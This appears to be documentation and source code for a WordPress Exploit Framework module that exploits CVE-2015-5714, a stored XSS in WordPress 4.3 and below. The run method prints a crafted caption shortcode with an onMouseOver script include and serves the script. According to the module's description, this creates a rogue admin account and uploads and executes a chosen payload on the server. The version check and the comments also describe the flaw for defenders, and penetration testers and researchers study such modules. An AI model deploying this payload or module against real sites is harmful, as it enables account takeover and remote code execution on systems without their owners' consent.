class Wpxf::Exploit::Wp43ShortcodeXssShellUpload

Public Class Methods

new()
Calls superclass method Wpxf::WordPress::Xss::new
# File lib/wpxf/modules/exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload.rb, line 7
# Registers this module's metadata (name, description, credits, advisory
# references and disclosure date) after the superclass has initialised.
#
# The metadata describes CVE-2015-5714, a stored XSS affecting WordPress 4.3
# and below. The URL reference is the WordPress 4.3.1 release announcement.
def initialize
  super

  # The description is two paragraphs joined by a single newline.
  overview = [
    'In version 4.3 and below of WordPress, a stored XSS ',
    'vulnerability exists that allows a user to store a script if ',
    'they have the required permissions to publish a new post.'
  ].join
  behaviour = [
    'This module prepares a shortcode that can be included in a post ',
    'which when hovered over by an admin user will create ',
    'a new admin user which will be used to upload and execute the ',
    'selected payload in the context of the web server.'
  ].join

  credits = [
    'Shahar Tal',    # Discovery and disclosure
    'Netanel Rubin', # Discovery and disclosure
    'rastating'      # WPXF module
  ]

  advisories = [
    %w[CVE 2015-5714],
    %w[WPVDB 8186],
    ['URL', 'https://wordpress.org/news/2015/09/wordpress-4-3-1/']
  ]

  update_info(
    name: 'WordPress <= 4.3 Shortcode Stored XSS Shell Upload',
    desc: "#{overview}\n#{behaviour}",
    author: credits,
    references: advisories,
    date: 'Sept 15 2015'
  )
end

Public Instance Methods

check()
# File lib/wpxf/modules/exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload.rb, line 34
# Version-only check: classifies the target by comparing the detected
# WordPress version with 4.3.1.
#
# The result reflects the version number alone. :vulnerable means the
# reported version is below 4.3.1, not that the flaw was confirmed on the
# target, and a site that hides or misreports its version yields :unknown
# or a misleading answer.
#
# @return [Symbol] :unknown when no version could be determined,
#   :vulnerable when it is below 4.3.1, otherwise :safe
def check
  detected = wordpress_version # presumably a Gem::Version or nil; verify in the mixin

  if detected.nil?
    :unknown
  elsif detected < Gem::Version.new('4.3.1')
    :vulnerable
  else
    :safe
  end
end
run()
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload.rb, line 41
# Prints the crafted [caption] shortcode for the operator to place in a post,
# then starts the module's HTTP server and reports the outcome.
#
# Returns false immediately when the superclass #run returns a falsy value;
# otherwise returns the value of @success once start_http_server returns.
def run
  return false unless super

  # Reset the outcome flag. Nothing in this method sets it to true, so any
  # success is presumably recorded by a request handler defined elsewhere
  # (TODO confirm against the Xss mixin).
  @success = false
  emit_info 'Create a new post with the below shorttag included:'
  puts
  # The shortcode is only printed here; this method never submits it to the
  # target. Per the module description, it must be published by an account
  # allowed to create posts and fires when an admin hovers over the link.
  # NOTE(review): for defenders, the stored artefact is a [caption] shortcode
  # whose caption attribute embeds anchor markup with an onMouseOver handler;
  # the module's own check treats WordPress 4.3.1 and later as safe.
  puts "[caption width=\"1\" caption='<a href=\"' \">]</a><a href=\""\
       "http://onMouseOver='#{xss_ascii_encoded_include_script}'"\
       '">Click Me</a>'
  puts

  # NOTE(review): start_http_server is defined outside this listing;
  # presumably it blocks while serving the included script. Confirm.
  start_http_server
  @success
end